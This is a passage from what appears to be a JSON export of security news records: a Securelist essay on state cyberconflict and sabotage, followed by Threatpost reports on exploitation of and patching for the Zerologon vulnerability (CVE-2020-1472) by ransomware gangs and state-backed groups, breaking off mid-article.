today&#x27;s human activity relies on information technology which implies that the former can be disrupted through the latter. A list of verticals that should be protected from foreign investments [was introduced](<http://proxy-pubminefi.diffusion.finances.gouv.fr/pub/document/18/17434.pdf>) in French law: energy, water distribution, transportation, health, telecommunications. It&#x27;s easy enough to see that each of them is regulated by computer systems that constitute high-value targets for a hostile party.\n\n[The Ukrainian conflict](<https://en.wikipedia.org/wiki/2017_cyberattacks_on_Ukraine>), which seems to be used as a large-scale hybrid war experiment by some actors, gives an idea of the many ways cyberwarfare could be used to destabilize a country:\n\n * In May 2014, three days before the Ukrainian elections, a company called Infosafe IT withstood an attack [aimed](<https://www.wsj.com/articles/ukraine-cyberwars-hottest-front-1447121671>) at preventing election results from being centralized. The day results were published, a fake press release announcing the victory of a far-right candidate [was distributed](<http://www.irbis-nbuv.gov.ua/cgi-bin/irbis_fpu/cgiirbis_64.exe?C21COM=2&I21DBN=UPRES&P21DBN=UPRES&Z21ID=&Image_file_name=PDF/491762280803.pdf&IMAGE_FILE_DOWNLOAD=0>) through the electoral commission&#x27;s website.\n * A cyberattack against three Ukrainian energy providers on December 23, 2015, left 225,000 clients with no electricity [for several hours](<https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf>). A similar incident happened in Kiev for about one hour on December 16, 2016.\n * On June 27, 2017, a Ukrainian tax accounting package used by most companies in the country (MeDoc) downloaded a malicious update that contained ransomware. Further analysis revealed that data decryption was not possible and that it was likely an attempt to destroy data forever. The incident caused over $10 billion in damages, making it [the most destructive cyberattack](<https://www.gov.uk/government/news/foreign-office-minister-condemns-russia-for-notpetya-attacks>) in history.\n\nIn other countries, the [Stuxnet worm](<https://www.kaspersky.com/about/press-releases/2014_stuxnet-patient-zero-first-victims-of-the-infamous-worm-revealed>) comes to mind. This piece of malware contained four 0day exploits and was design to infect SCADA systems in the Natanz nuclear plant in Iran. Infected systems would send erroneous commands to the underlying programmable logic controller (PLC) while still displaying expected results to the plant operators. This damaged the centrifuges and confused researchers, effectively slowing down Iran&#x27;s research in the nuclear physics field. But the general, modular design of Stuxnet indicates that variants could have been created to go after other types of SCADA system. This detail could be indicative of a larger (and unpublished) sabotage doctrine followed by the creators of Stuxnet.\n\nIt is unclear whether it followed Stuxnet&#x27;s precedent, but a couple of years later, a wave of destructive attacks was launched against the oil industry in the Middle East. Shamoon was far from the sophistication level of our previous example, but it did major damage nonetheless. It involved a wiper malware whose purpose was to erase files from the victim&#x27;s computers and render them unusable. When it was first used in 2012, it disabled over 30,000 computers.\n\nThen, in 2017, a Saudi refinery [was targeted](<https://foreignpolicy.com/2017/12/21/cyber-attack-targets-safety-system-at-saudi-aramco/>) by an attack against its safety systems in a deliberate attempt to cause physical harm. The malware, dubbed Triton, was designed to tamper with an industrial safety system&#x27;s emergency shutdown function. Thankfully, the attack only resulted in interruption to a chemical process and did not cause the uncontrolled energy buildup the attackers were likely trying to achieve.\n\nIn recent years, many incidents have involved wipers: [Dark Seoul](<https://securelist.com/south-korean-whois-team-attacks/65106/>) and the [Sony](<https://securelist.com/destover/67985/>) hack as well as [operation Blockbuster](<https://securelist.com/operation-blockbuster-revealed/73914/>) attributed to the Lazarus Group, and others involving the [StoneDrill](<https://securelist.com/from-shamoon-to-stonedrill/77725/>) malware we discovered while investigating Shamoon. So far, we are not aware of any casualties caused by destructive cyberattacks, but there&#x27;s little doubt that they are used as coercive force and can be construed as a form of violence. An interesting question is whether they could be interpreted as &quot;acts of war&quot;.\n\nIn August 2019, NATO released [a cyber-resilience supplement](<https://www.nato.int/cps/en/natohq/news_168435.htm?selectedLocale=en>) in which the organization stated: &quot;a serious cyberattack could trigger Article 5, where an attack against one ally is treated as an attack against all&quot;. While the notion of &quot;serious cyberattack&quot; is not clearly defined, it does send a strong political signal that actions taking place in cyberspace can be interpreted as an attack and may in fact cause a collective response from the alliance. In the military sense, this declaration establishes cyberspace as a battleground. Other countries appear to share this view: in 2019, Israel [bombed a building](<https://www.zdnet.com/article/in-a-first-israel-responds-to-hamas-hackers-with-an-air-strike/>) it claimed was used by Hamas to conduct cyberattacks against its interests. While this was not the first time a state [went after hackers in the physical world](<https://www.defense.gov/Explore/News/Article/Article/615305/iraq-progresses-in-isil-fight-key-extremist-confirmed-dead/>), it was an unprecedented example of immediate cyber-to-kinetic escalation. Those few nations (i.e., the US and France) who published cyber-engagement policies usually reserve the right to respond to attacks in cyberspace through any appropriate means, which implicitly includes lethal force.\n\nSince sabotage operations disrupt a government&#x27;s ability to rule or have the power to shut down a country&#x27;s economy, they represent a major threat to sovereignty. In the most extreme case, attacks in cyberspace can lay the ground for (or support) traditional military operations, for instance by disabling security systems or communication devices that would usually help organize the defensive response.\n\nIn the coming years, we can expect that:\n\n * **The sort of attacks described above will become more widespread**. The impact of these operations is now evident and they should be expected in any future armed conflict.\n * Some** sabotage attempts will happen under a false flag** to muddle diplomatic relations between two countries. Some actors have already taken significant steps to influence the way their actions would be interpreted: \n * The aforementioned MeDoc attack was disguised as a criminal ransomware attempt.\n * French TV channel TV5 Monde was hacked and taken off air for 18 hours in a destructive attack that also destroyed data. The hack was claimed by an ISIS-aligned group (Cyber Caliphate), but is believed to have originated from a Russian threat actor [instead](<https://ccdcoe.org/uploads/2018/10/CyberWarinPerspective_full_book.pdf>).\n * An attack against the PyeongChang Olympic games contained indicators implicating North Korea that [we now know to be fake](<https://securelist.com/the-devils-in-the-rich-header/84348/>).\n * **Diplomatic duress or **[**retaliation**](<https://www.washingtonpost.com/world/national-security/us-cyber-command-operation-disrupted-internet-access-of-russian-troll-factory-on-day-of-2018-midterms/2019/02/26/1827fc9e-36d6-11e9-af5b-b51b7ff322e9_story.html>)** might take place in the form of sabotage and cyber-capabilities will be used to exert pressure between states**. For instance, critical infrastructure could be disabled, or local companies could be taken down as a way to express discontent. Demonstrating such offensive cyber-capabilities would convey strong messages that would be less of a commitment than moving troops.\n\n### Recommendations\n\nIn the interest of promoting cyber-stability and reducing the impact of sabotage, we would like to propose the following:\n\n * **States should publish a doctrine** that defines how they regard engagements in cyberspace, if they haven&#x27;t already done so. A more detailed call for transparency from Kaspersky can be found in the [various](<https://front.un-arm.org/wp-content/uploads/2020/03/kaspersky-position-paper-on-oewg-first-pre-draft-report.pdf>) [contributions](<https://front.un-arm.org/wp-content/uploads/2020/06/kaspersky-position-paper-on-oewg-second-pre-draft-report-11-june-2020.pdf>) we submitted to the UN&#x27;s OEWG. This doctrine should take into account how uncertain the attribution process for cyberattacks is.\n * Making sure that critical systems are located exclusively on **networks that are not connected to the internet**. By spearheading the concept of [cyber immunity](<https://www.kaspersky.com/about/press-releases/2019_eugene-kaspersky-explains-cyber-immunity-at-insead-business-school>), Eugene Kaspersky provides additional recommendations to make such infrastructure more resilient.\n * Clarifying rules of cyber-engagements at an international level as well as providing clarity on how they should be implemented both **to ban and prevent** **destructive attacks targeting civilian infrastructure**. We also advocate for greater clarity from states on how cyberconflicts can be de-escalated.\n * **Having a proactive approach** that aims at detecting intrusions in strategic entities (as opposed to simply preventing them). A sabotage operation requires months of preparation after the victim&#x27;s network has been breached. During that time, the defenders have a chance to discover the attackers and contain them before actual harm has been done.\n\n## Conclusion\n\nIt may seem na\u00efve to imagine that the international community could at this moment reach a broad consensus regarding the rules for cyberwarfare or how the existing IHL applies to cyberspace. Yet over the past century, the world managed to define a number of acceptable rules for military conflicts: the Geneva Convention defines rights afforded to non-combatants. But while in traditional warfare it is easy to evaluate the cost (usually in human lives) of being subjected to certain practices, the nature of cybersecurity makes this quite difficult: intelligence collection and data theft are invisible, information campaigns can&#x27;t always be identified as such and sabotage may be indistinguishable from accidents. In other words, **decision-makers have data that shows the benefit of unregulated cyberwarfare, thanks to their own operations, but are oblivious to what it costs them**. This partial vision, shared by all actors, does not encourage moderation.\n\nAnd so, this article closes on a pessimistic note. Do any of the parties involved have an interest in regulating cyberwarfare? If they did, would they even be aware it? Historically, means of destruction could only be downsized thanks to civil protest and public pressure. In the end, no matter how far away or even unrealistic the dream of world peace seems to be, it is still one worth fighting for. As for the information technology field, it has been described as &quot;young&quot; and &quot;growing&quot; for the past 30 years. Maybe now is the time it became &quot;adult&quot;.", "modified": "2020-12-18T10:00:10", "published": "2020-12-18T10:00:10", "id": "SECURELIST:847981DCB9E90C51F963EE1727E40915", "href": "https://securelist.com/the-future-of-cyberconflicts/99859/", "type": "securelist", "title": "The future of cyberconflicts", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2020-09-21T19:45:56", "bulletinFamily": "info", "cvelist": ["CVE-2020-1472"], "description": "Federal agencies that haven\u2019t patched their Windows Servers against the \u2018Zerologon\u2019 vulnerability by Monday Sept. 21 at 11:59 pm EDT are in violation of a rare emergency directive issued by the Secretary of Homeland Security.\n\nWith only hours until the deadline for the directive, [issued on Friday](<https://cyber.dhs.gov/ed/20-04/>), to be executed, what is at stake is a \u201cvulnerability [that] poses an unacceptable risk to the Federal Civilian Executive Branch and requires an immediate and emergency action,\u201d according to the [Cybersecurity and Infrastructure Security Agency](<https://cyber.dhs.gov/assets/report/ed-20-04.pdf>) (PDF).\n\nMicrosoft released a patch for the vulnerability ([CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>)) as part of its [August 11, 2020 Patch Tuesday security updates](<https://threatpost.com/microsoft-out-of-band-security-update-windows-remote-access-flaws/158511/>). However, [earlier this month the stakes got higher](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for risks tied to the bug when four public proof-of-concept exploits for the flaw were released on** **[Github.](<https://github.com/dirkjanm/CVE-2020-1472>)\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe bug is located in a core authentication component of Active Directory within the Windows Server OS and the Microsoft Windows Netlogon Remote Protocol (MS-NRPC). Exploiting the bug allows an unauthenticated attacker, with network access to a domain controller, to completely compromise all Active Directory identity services, according to Microsoft.\n\n\u201cThis attack has a huge impact: It basically allows any attacker on the local network (such as a malicious insider or someone who simply plugged in a device to an on-premise network port) to completely compromise the Windows domain,\u201d said researchers with Secura, [in a whitepaper](<https://www.secura.com/pathtoimg.php?id=2055>) published earlier this month.\n\n[As previous reported](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>), the flaw stems from the Netlogon Remote Protocol, available on Windows domain controllers, which is used for various tasks related to user and machine authentication.\n\n\u201cThe issue exists in the usage of AES-CFB8 encryption for Netlogon sessions. The AES-CFB8 standard requires that each \u2018byte\u2019 of plaintext have a randomized initialization vector (IV), blocking attackers from guessing passwords. However, Netlogon\u2019s ComputeNetlogonCredential function sets the IV to a fixed 16 bits \u2013 not randomized \u2013 meaning an attacker could control the deciphered text,\u201d according to earlier reporting.\n\nSince the flaw was first identified it has been [under active attack](<https://threatpost.com/0-days-active-attack-bugs-patched-microsoft/158280/>). Calls for immediate patching have been unanimous. However, the Monday deadline for patching by CISA suggests still too many systems have not been updated.\n\n\u201cThis emergency directive remains in effect until all agencies have applied the August 2020 Security Update (or other superseding updates) or the directive is terminated through other appropriate action,\u201d according to CISA.\n\nThe directive is part of the Department of Homeland Security\u2019s_ \u201c[Section 3553(h) of title 44](<https://uscode.house.gov/view.xhtml?req=\\(title:44%20section:3553%20edition:prelim\\)%20OR%20\\(granuleid:USC-prelim-title44-section3553\\)&f=treesort&edition=prelim&num=0&jumpTo=true>)\u201d _U.S. Code of Laws.\n\nThe directive requires security teams at those affected federal civilian and executive branch departments to update all Windows Servers with the domain controller role by midnight EDT Sept. 21. \u201cIf affected domain controllers cannot be updated, ensure they are removed from the network,\u201d the agency said.\n\nNext, agencies must ensure \u201ctechnical and/or management controls are in place to ensure newly provisioned or previously disconnected domain controller servers are updated before connecting to agency networks,\u201d CISA wrote.\n\n\u201cThe availability of the exploit code in the wild increasing likelihood of any upatched domain controller being exploited,\u201d the agency said. It added the widespread presence of the vulnerable domain controllers across the federal enterprise is a concern, coupled with the high potential for agency information systems to be compromised.\n\nThe CISA directive orders those agencies, by 11:59 PM EDT, Wednesday, Sept. 23, 2020, to submit a \u201ccompletion report\u201d to DHS.\n\n\u201cBeginning Oct. 1, 2020, the CISA Director will engage the CIOs and/or Senior Agency Officials for Risk Management of agencies that have not completed required actions, as appropriate and based on a risk-based approach,\u201d read the CISA directive signed by Christopher Krebs, Director, Cybersecurity and Infrastructure Security Agency, within the Department of Homeland Security.\n", "modified": "2020-09-21T19:29:21", "published": "2020-09-21T19:29:21", "id": "THREATPOST:F60D403369A535076F39A474F74C925E", "href": "https://threatpost.com/dire-patch-warning-zerologon/159404/", "type": "threatpost", "title": "DHS Issues Dire Patch Warning for \u2018Zerologon\u2019", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-19T16:58:13", "bulletinFamily": "info", "cvelist": ["CVE-2020-1472"], "description": "The Ryuk threat actors have struck again, moving from sending a phishing email to complete encryption across the victim\u2019s network in just five hours.\n\nThat breakneck speed is partially the result of the gang using the Zerologon privilege-escalation bug (CVE-2020-1472), less than two hours after the initial phish, researchers said.\n\nThe Zerologon vulnerability allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services, according to Microsoft. It was patched in August, but many organizations remain vulnerable.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIn this particular attack, after the attackers elevated their privileges using Zerologon, they used a variety of commodity tools like Cobalt Strike, AdFind, WMI and PowerShell to accomplish their objective, according to the analysis from researchers at the DFIR Report, [issued Sunday](<https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/>).\n\n## **The Attack Begins**\n\nThe attack started with a phishing email containing a version of the Bazar loader, researchers said. From there, the attackers performed basic mapping of the domain, using built-in Windows utilities such as Nltest. However, they needed to escalate their privileges to do any real damage, so they exploited the recently disclosed Zerologon vulnerability, researchers said.\n\nHaving gained elevated admin privileges, the cybercriminals were able to reset the machine password of the primary domain controller, according to the analysis.\n\nThen, they moved laterally to the secondary domain controller, carrying out more domain discovery via Net and the PowerShell Active Directory module.\n\n\u201cFrom there, the threat actors appeared to use the default named pipe privilege escalation module on the server,\u201d researchers said. \u201cAt this point, the threat actors used [Remote Desktop Protocol] RDP to connect from the secondary domain controller to the first domain controller, using the built-in administrator account.\u201d\n\n## **Cobalt Strike**\n\nLateral movement was initiated via Server Message Block (SMB) and Windows Management Instrumentation (WMI) executions of Cobalt Strike beacons, researchers said. SMB is a networking file-share protocol included in Windows 10 that provides the ability to read and write files to network devices. WMI meanwhile enables management of data and operations on Windows-based operating systems.\n\nCobalt Strike belongs to a group of dual-use tools that are typically leveraged for both exploitation and post-exploitation tasks. Other examples in circulation include PowerShell Empire, Powersploit and Metasploit, according to [recent findings](<https://threatpost.com/fileless-malware-critical-ioc-threats-2020/159422/>) from Cisco.\n\n\u201cFrom memory analysis, we were also able to conclude the actors were using a trial version of Cobalt Strike with the EICAR string present in the network configuration for the beacon. Both portable executable and DLL beacons were used,\u201d researchers added.\n\nOnce on the main domain controller, another Cobalt Strike beacon was dropped and executed.\n\nThe analysis of the attack revealed that after about four hours and 10 minutes, the Ryuk gang pivoted from the primary domain controller, using RDP to connect to backup servers.\n\n\u201cThen more domain reconnaissance was performed using AdFind. Once this completed\u2026the threat actors were ready for their final objective,\u201d according to DFIR\u2019s report.\n\n## **Five Hours Later: Ryuk**\n\nFor the final phase of the attack, the Ryuk operators first deployed their ransomware executable onto backup servers. After that, the malware was dropped on other servers in the environment, and then workstations.\n\nRyuk is a highly active malware, responsible for a string of recent hits, including a high-profile attack that [shut down Universal Health Services](<https://threatpost.com/universal-health-ransomware-hospitals-nationwide/159604/>) (UHS), a Fortune-500 owner of a nationwide network of hospitals.\n\n\u201cThe threat actors finished their objective by executing the ransomware on the primary domain controller, and at the five-hour mark, the attack completed,\u201d researchers said.\n\nThe use of Zerologon made the cybrcriminals\u2019 efforts much easier, since the attack didn\u2019t need to be aimed at a high-privileged user who would likely have more security controls.\n\nIn fact, the toughest part of the campaign was the start of the attack \u2013 the successful installation of Bazar from the initial phishing email, which required user interaction. Researchers note that the user was a Domain User and did not have any other permissions \u2013 but that proved to be a non-issue, thanks to Zerologon.\n\nThe attack shows that organizations need to be ready to move more quickly than ever in response to any detected malicious activity.\n\n\u201cYou need to be ready to act in less than an hour, to make sure you can effectively disrupt the threat actor,\u201d according to researchers.\n\n## **Zerologon Attacks Surge**\n\nThe case study comes as exploitation attempts against Zerologon spike. Government officials [last week warned that](<https://threatpost.com/election-systems-attack-microsoft-zerologon/160021/>) advanced persistent threat actors (APTs) are now leveraging the bug to target elections support systems.\n\nThat came just days after [Microsoft sounded the alarm that an Iranian nation-state actor](<https://threatpost.com/microsoft-zerologon-attack-iranian-actors/159874/>) was actively exploiting the flaw ([CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>)). The APT is MERCURY (also known as MuddyWater, Static Kitten and Seedworm). And, [Cisco Talos researchers also recently warned of](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>) a spike in exploitation attempts against Zerologon.\n\n[In September, the stakes got higher](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for risks tied to the bug when four public proof-of-concept exploits for the flaw were released on** **Github. This spurred the Secretary of Homeland Security [to issue a rare emergency directive](<https://threatpost.com/dire-patch-warning-zerologon/159404/>), ordering federal agencies to patch their Windows Servers against the flaw by Sept. 2.\n\n_ _\n", "modified": "2020-10-19T16:36:00", "published": "2020-10-19T16:36:00", "id": "THREATPOST:870C912F079364DE3A8DADFDBE4E42D1", "href": "https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/160286/", "type": "threatpost", "title": "Ryuk Ransomware Gang Uses Zerologon Bug for Lightning-Fast Attack", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-06T21:57:05", "bulletinFamily": "info", "cvelist": ["CVE-2020-1472"], "description": "At least 16 anti-doping authorities and sporting organizations around the world have been hit by cyberattacks as the world begins to gear up for the Tokyo Summer Olympic Games, which kick off July 2020.\n\nThe attacks, which began Sept. 16, have been linked to infamous Russian threat group [Fancy Bear](<https://threatpost.com/tag/fancy-bear/>) (also known as APT28, Strontium and Sofacy), according to a Monday alert by Microsoft Threat Intelligence Center. Microsoft did not specify the names of targeted companies. The company said that some of these attacks were successful, but the majority were not.\n\n\u201cThe methods used in the most recent attacks are similar to those routinely used by Strontium to target governments, militaries, think tanks, law firms, human rights organizations, financial firms and universities around the world,\u201d said Tom Burt, corporate vice president, customer security and trust at Microsoft, [in a Monday post](<https://blogs.microsoft.com/on-the-issues/2019/10/28/cyberattacks-sporting-anti-doping/>). \u201cStrontium\u2019s methods include spearphishing, password spray, exploiting internet-connected devices and the use of both open-source and custom malware.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIn addition to their timing before the [2020 Summer Olympic Games](<https://www.olympic.org/tokyo-2020>) in Tokyo, the attacks also coincide with the World Anti-Doping Agency\u2019s (WADA) [reported](<https://www.bbc.com/sport/athletics/49805296>) warning in September that Russia could face a ban from all major sports events over \u201cdiscrepancies\u201d in a lab database.\n\nA WADA spokesperson told Threatpost that there is no evidence of any breach on WADA\u2019s systems.\n\n\u201cWADA takes the issue of cyber-security extremely seriously,\u201d the WADA spokesperson told Threatpost. \u201cAs a matter of course, the Agency closely and continually monitors all its systems, regularly updating and strengthening its defenses \u2013 both in terms of technological advancements and by ensuring our users are aware of and properly educated regarding security.\u201d\n\nFancy Bear has [previously targeted](<https://www.nytimes.com/2018/01/10/sports/olympics/russian-hackers-emails-doping.html>) anti-doping and sporting organizations, in 2016 and 2018 hacking various organizations, including the World Anti-Doping Agency (WADA). The APT accessed its database and released medical records and emails for U.S. Olympic gymnastics phenom Simone Biles as well as tennis stars Serena Williams and Rafael Nadal.\n\nThese previous attacks led to the [U.S. charging members](<https://www.justice.gov/opa/pr/us-charges-russian-gru-officers-international-hacking-and-related-influence-and>) of the Fancy Bear team with computer hacking, wire fraud, aggravated identity theft and money laundering in 2018.\n\nFancy Bear has been [linked to Russia](<https://threatpost.com/fbi-dhs-report-links-fancy-bear-to-election-hacks/122802/>) by the U.S. government, which attributed election-season hacking during the 2016 presidential election to the group. The APT has also been linked to hacking and disinformation attacks during the [French](<https://www.theguardian.com/world/2017/may/08/macron-hackers-linked-to-russian-affiliated-group-behind-us-attack>) and [German](<https://www.zeit.de/digital/2017-05/cyberattack-bundestag-angela-merkel-fancy-bear-hacker-russia/seite-6>) presidential elections in 2017; hacking Republican think-tanks and spreading fake social media sites leading up to the [U.S. midterm elections](<https://www.forbes.com/sites/kateoflahertyuk/2018/08/23/midterm-election-hacking-who-is-fancy-bear/#4519c3192325>) in 2018; and a range of other espionage and influence campaigns related to sowing chaos and discord into democratic processes.\n\nMost recently, in [February, Microsoft warned](<https://threatpost.com/microsoft-russias-fancy-bear-working-to-influence-eu-elections/142007/>) that APT28 was amping up their efforts to target journalists, think-tanks, non-governmental organizations and other members of civil society before the May elections for European Parliament.\n\nCoincidentally, [just this past week](<https://threatpost.com/cybercriminals-impersonate-russian-apt-fancy-bear-to-launch-ddos-attacks/149578/>) cybercriminals posing as Fancy Bear were spotted launching DDoS attacks against companies in the financial sector and demanding ransom payments.\n\nMicrosoft\u2019s Burt recommends that anti-doping and sporting organization employees enable two-factor authentication on all business and personal email accounts, learn how to detect phishing schemes and enable security alerts about links and files from suspicious websites.\n\n\u201cAs we\u2019ve said in the past, we believe it\u2019s important to share significant threat activity like that we\u2019re announcing today,\u201d said Burt. \u201cWe think it\u2019s critical that governments and the private sector are increasingly transparent about nation-state activity so we can all continue the global dialogue about protecting the internet. We also hope publishing this information helps raise awareness among organizations and individuals about steps they can take to protect themselves.\u201d\n\n**_Interested in the role of artificial intelligence in cybersecurity, for both offense and defense? Don\u2019t miss our free _**[**_Threatpost webinar_**](<https://register.gotowebinar.com/register/8988544242398214146?source=ART>)**_, AI and Cybersecurity: Tools, Strategy and Advice, with senior editor Tara Seals and a panel of experts. [Click here to register.](<https://register.gotowebinar.com/register/8988544242398214146?source=ART>)_**\n", "modified": "2019-10-29T14:57:44", "published": "2019-10-29T14:57:44", "id": "THREATPOST:2F655C93B7912A7C776E1DC1D39822D0", "href": "https://threatpost.com/cyberattacks-sporting-anti-doping-orgs-as-2020-olympics-loom/149634/", "type": "threatpost", "title": "Fancy Bear Targets Sporting, Anti-Doping Orgs As 2020 Olympics Loom", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-30T22:48:56", "bulletinFamily": "info", "cvelist": ["CVE-2020-1472"], "description": "Threat attackers continue to exploit the Microsoft Zerologon vulnerability, a situation that\u2019s been a persistent worry to both the company and the U.S. government over the last few months. Both on Thursday renewed their pleas to businesses and end users to update Windows systems with a patch Microsoft released in August to mitigate attacks.\n\nDespite patching awareness efforts, Microsoft said it is still receiving \u201ca small number of reports from customers and others\u201d about active exploits of the bug tracked as [CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>), or Zerologon, according to a [blog post](<https://msrc-blog.microsoft.com/2020/10/29/attacks-exploiting-netlogon-vulnerability-cve-2020-1472/>) by Aanchal Gupta, vice president of engineering for MSRC, on Thursday.\n\nThe zero-day elevation-of-privilege vulnerability\u2014rated as critical and first disclosed and [patched on Aug. 11](<https://threatpost.com/0-days-active-attack-bugs-patched-microsoft/158280/>)\u2013could allow an attacker to spoof a domain controller account and then use it to steal domain credentials, take over the domain and completely compromise all Active Directory identity services. \n[](<https://threatpost.com/newsletter-sign/>) \nThe bug is located in a core authentication component of Active Directory within the Windows Server OS and the Microsoft Windows Netlogon Remote Protocol (MS-NRPC). The flaw stems from the Netlogon Remote Protocol, available on Windows domain controllers, which is used for various tasks related to user and machine authentication.\n\nGupta urged organizations to deploy the Aug.11 patch or later release to every domain controller as the first in a four-step process to fix the vulnerability. Then administrators should monitor event logs to find which devices are making vulnerable connections; address identified non-compliant devices; and enable enforcement to address the bug in the overall environment, he said.\n\n\u201cOnce fully deployed, Active Directory domain controller and trust accounts will be protected alongside Windows domain-joined machine accounts,\u201d he said.\n\nIn addition to Microsoft\u2019s patches, last month both Samba and 0patch also [issued fixes](<https://threatpost.com/zerologon-patches-beyond-microsoft/159513/>) for CVE-2020-1472 to fill in the some of the gaps that the official patch doesn\u2019t address, such as end-of-life versions of Windows.\n\nMicrosoft\u2019s latest advisory was enough for the Department of Homeland Security\u2019s (DHS\u2019s) Cybersecurity and Infrastructure Security Agency (CISA) to step in and issue a [statement](<https://us-cert.cisa.gov/ncas/current-activity/2020/10/29/microsoft-warns-continued-exploitation-cve-2020-1472>) of its own Thursday warning organizations about continued exploit of the bug.\n\nGiven the severity of the vulnerability, the government has been nearly as active as Microsoft in urging people to update their systems. Interest from the feds likely has intensified since Microsoft\u2019s [warning earlier this month](<https://threatpost.com/microsoft-zerologon-attack-iranian-actors/159874/>) that an Iranian nation-state advanced persistent threat (APT) actor that Microsoft calls MERCURY (also known as MuddyWater, Static Kitten and Seedworm) is now actively exploiting Zerologon.\n\n\u201cCISA urges administrators to patch all domain controllers immediately\u2014until every domain controller is updated, the entire infrastructure remains vulnerable, as threat actors can identify and exploit a vulnerable system in minutes,\u201d according to the CISA alert.\n\nThe agency even has released a [patch validation script](<https://github.com/cisagov/cyber.dhs.gov/tree/master/assets/report/ed-20-04_script>) to detect unpatched Microsoft domain controllers to help administers install the update. \u201cIf there is an observation of CVE-2020-1472 Netlogon activity or other indications of valid credential abuse detected, it should be assumed that malicious cyber actors have compromised all identity services,\u201d the CISA warned.\n\nZerologon has been a consistent thorn in Microsoft\u2019s side since its discovery, a scenario that has escalated since early September thanks largely to the publication of [four proof-of-concept exploits](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for the flaw on** **[Github.](<https://github.com/dirkjanm/CVE-2020-1472>) Soon after the exploits were published, Cisco Talos researchers [warned of a spike](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>) in exploitation attempts against Zerologon.\n\nThe U.S. government first stepped in to rally organizations to update after the publication of the exploits, with the DHS issuing [a rare emergency directive](<https://cyber.dhs.gov/assets/report/ed-20-04.pdf>) that ordered federal agencies to patch their Windows Servers against the flaw by Sept. 21.\n\n#### **Hackers Put Bullseye on Healthcare: ****[On Nov. 18 at 2 p.m. EDT](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) find out why hospitals are getting hammered by ransomware attacks in 2020. [Save your spot for this FREE webinar](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) on healthcare cybersecurity priorities and hear from leading security voices on how data security, ransomware and patching need to be a priority for every sector, and why. Join us Wed., Nov. 18, 2-3 p.m. EDT for this [LIVE](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>), limited-engagement webinar.**\n", "modified": "2020-10-30T11:41:36", "published": "2020-10-30T11:41:36", "id": "THREATPOST:A47D83D4BBBE115E6424755328525B9D", "href": "https://threatpost.com/microsoft-warns-zerologon-bug/160769/", "type": "threatpost", "title": "Microsoft Warns Threat Actors Continue to Exploit Zerologon Bug", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-19T15:10:38", "bulletinFamily": "info", "cvelist": ["CVE-2020-1472"], "description": "China-backed APT Cicada joins the list of threat actors leveraging the [Microsoft Zerologon](<https://threatpost.com/microsoft-warns-zerologon-bug/160769/>) bug to stage attacks against their targets. In this case, victims are large and well-known Japanese organizations and their subsidiaries, including locations in the United States.\n\nResearchers observed a \u201clarge-scale attack campaign targeting multiple Japanese companies\u201d across 17 regions and various industry sectors that engaged in a range of malicious activity, such as credential theft, data exfiltration and network reconnaissance. Attackers also installed the [QuasarRAT](<https://threatpost.com/microsoft-word-resume-phish-malware/147733/>) open-source backdoor and novel Backdoor.Hartip tool to continue surveillance on victims\u2019 systems, according a recent report.\n\nDue to some notable hallmark activity, the attacks appear to be the work of Cicada (aka APT10, Stone Panda, Cloud Hopper), a state-sponsored threat group which has links to the Chinese government, researchers at Broadcom\u2019s Symantec said. \n[](<https://threatpost.com/newsletter-sign/>) \n\u201cThis campaign has been ongoing since at least mid-October 2019, right up to the beginning of October 2020, with the attack group active on the networks of some of its victims for close to a year,\u201d researchers wrote in a [report](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage>) posted online. \u201cThe campaign is very wide-ranging, with victims in a large number of regions worldwide.\u201d\n\nA number of threat patterns and techniques observed in the campaign that link the activity to Cicada, including a third-stage DLL with an export named \u201cF**kYouAnti;\u201d a third-stage DLL using CppHostCLR technique to inject and execute the .NET loader assembly; .NET Loader obfuscation using ConfuserEx v1.0.0; and the delivery of QuasarRAT as the final payload.\n\nResearchers observed attackers leveraging Zerologon, or [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>), a Microsoft zero-day elevation-of-privilege vulnerability first disclosed and [patched on Aug. 11](<https://threatpost.com/0-days-active-attack-bugs-patched-microsoft/158280/>). The flaw\u2014which stems from the Netlogon Remote Protocol available on Windows domain controllers\u2013allows attackers to spoof a domain controller account and then use it to steal domain credentials, take over the domain and completely compromise all Active Directory identity services.\n\n\u201cAmong machines compromised during this attack campaign were domain controllers and file servers, and there was evidence of files being exfiltrated from some of the compromised machines,\u201d researchers observed.\n\nZerologon has been a thorn in the side of Microsoft for some time, with multiple APTs and other attackers [taking 